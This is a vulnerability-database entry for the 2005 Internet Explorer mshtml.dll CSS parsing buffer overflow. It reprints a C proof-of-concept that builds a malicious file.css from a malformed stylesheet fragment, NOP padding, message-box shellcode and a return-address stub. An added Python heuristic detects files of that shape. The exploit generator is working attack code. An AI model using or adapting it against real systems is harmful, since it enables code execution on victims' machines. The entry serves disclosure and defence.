Microsoft Internet Explorer – ‘mshtml.dll’ CSS Parsing Buffer Overflow

Vulnerability ID: 1054959    Vulnerability type:
Published: 2005-03-09    Updated: 2005-03-09
CVE number: N/A
CNNVD-ID: N/A
Platform: Windows    CVSS score: N/A
|Source
https://www.exploit-db.com/exploits/868
|Vulnerability details
Vulnerability details have not yet been disclosed.
|Vulnerability EXP
/* 
Taken from http://www.securiteam.com/exploits/5NP042KF5A.html 

The exploit will create a .CSS file that should be included 
in an HTML file. When a user loads the HTML file, Internet 
Explorer will try to parse the CSS and will trigger the 
buffer overflow. 
*/

//Exploit Code:
#include <stdio.h>
#include <string.h>
#include <tchar.h>

// 48-byte malformed stylesheet fragment that triggers the parser bug:
//   @css mm{I{content: "";/*" "*/}}@m;@end; /*"}}
char bug[]=
"\x40\x63\x73\x73\x20\x6D\x6D\x7B\x49\x7B\x63\x6F\x6E\x74\x65\x6E\x74\x3A\x20\x22\x22\x3B\x2F"
"\x2A\x22\x20\x22\x2A\x2F\x7D\x7D\x40\x6D\x3B\x40\x65\x6E\x64\x3B\x20\x2F\x2A\x22\x7D\x7D\x20\x20\x20";

//////////////////////////////////////////////////////
/*
shellcode :MessageBox (0,"hack ie6",0,MB_OK);
-
XOR EBX,EBX
PUSH EBX ; 0
PUSH EBX ; 0
ADD AL,0F
PUSH EAX ; Msg " Hack ie6 "
PUSH EBX ;0
JMP 746D8E72 ;USER32.MessageBoxA
*/

// 27 bytes: the MessageBoxA stub above followed by two NOPs and the ASCII text "Hack ie6 css"
char shellcode[]= "\x33\xDB\x53\x53\x04\x0F\x50\x53\xE9\xCB\x8D\x6D\x74"
"\x90\x90\x48\x61\x63\x6B\x20\x69\x65\x36\x20\x63\x73\x73";


////////////////////////////////////////////////////////
// return address :: esp+1AC :: start shellcode
//MOV EAX,ESP
//ADD AX,1AC
//CALL EAX

char ret[]= "\x8B\xC4\x66\x05\xAC\x01\xFF\xD0";

int main(int argc, char* argv[])
{
    char buf[8192];
    FILE *cssfile;
    int i;

    printf("\n\n Internet Explorer(mshtml.dll) , Cascading Style Sheets Exploit \n");
    printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n");
    printf(" Coded by : Arabteam2000 \n");
    printf(" Web: www.arabteam2000.com \n");
    printf(" ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n");

    // fill the whole 8192-byte file with NOPs (0x90)
    for(i=0;i<8192;i++)
        buf[i]=0x90;

    // bug: the 48-byte malformed stylesheet fragment at the start of the file
    memcpy(&buf[0], bug, 48);

    // shellcode: 27 bytes at offset 100
    memcpy(&buf[100], shellcode, 27);

    // ret address: 8-byte stub at offset 8182 (the last 10 bytes of the file)
    memcpy(&buf[8182], ret, 8);

    cssfile=fopen("file.css","w+b");
    if(cssfile==NULL){
        printf("-Error: fopen \n");
        return 1;
    }

    fwrite(buf,8192,1,cssfile);
    printf("-Created file: file.css\n ..OK\n\n");

    fclose (cssfile);
    return 0;
}

// milw0rm.com [2005-03-09]
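As an added defender-side example (not part of the exploit-db entry and not written by its author): a triage heuristic that flags a stylesheet shaped like the file.css the generator above writes. It reuses the page's own 48-byte fragment and its 0x90 padding; the constructed sample deliberately leaves out the shellcode and return-address bytes, and the NOP-run threshold is an assumption, not a value from the page.

```python
import sys

NOP = 0x90  # x86 NOP; the generator pads its 8192-byte file.css with this byte

# The 48-byte stylesheet fragment from the exploit above, decoded from its
# \x.. escapes (page data, not an assumption).
BUG_FRAGMENT = b'@css mm{I{content: "";/*" "*/}}@m;@end; /*"}}   '

def build_sample() -> bytes:
    """Constructed stand-in for file.css: the fragment plus NOP padding only.
    The exploit's shellcode and return-address bytes are deliberately omitted."""
    return BUG_FRAGMENT + bytes([NOP]) * (8192 - len(BUG_FRAGMENT))

def longest_nop_run(data: bytes) -> int:
    """Length of the longest run of consecutive 0x90 bytes."""
    best = run = 0
    for b in data:
        run = run + 1 if b == NOP else 0
        best = max(best, run)
    return best

def css_findings(data: bytes, nop_threshold: int = 32) -> dict:
    """Return a dict of findings; an empty dict means nothing suspicious.
    nop_threshold is an assumed cut-off, not a value from the page."""
    findings = {}
    # A stylesheet is text; a long run of NOP bytes is exploit padding, not CSS.
    run = longest_nop_run(data)
    if run >= nop_threshold:
        findings["nop_run"] = run
    # 0x90 is a lone UTF-8 continuation byte, so the generated file is not
    # valid UTF-8 at all, whereas a real stylesheet decodes cleanly.
    try:
        data.decode("utf-8")
    except UnicodeDecodeError:
        findings["not_utf8"] = True
    # The fragment ends in a "/*" that is never closed: a comment left open
    # to end of file, which is what the parser is forced to cope with.
    if data.rfind(b"/*") > data.rfind(b"*/"):
        findings["unterminated_comment"] = True
    return findings

def is_suspicious(data: bytes) -> bool:
    return bool(css_findings(data))

if __name__ == "__main__":
    # usage: python check_css.py [file.css]; without an argument the
    # constructed sample is checked instead
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else build_sample()
    print(css_findings(data) or "no findings")
```

This is a byte-level heuristic for triage, not a CSS parser; a legitimate stylesheet with an open comment trips only the third check, so treat the findings together rather than individually.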
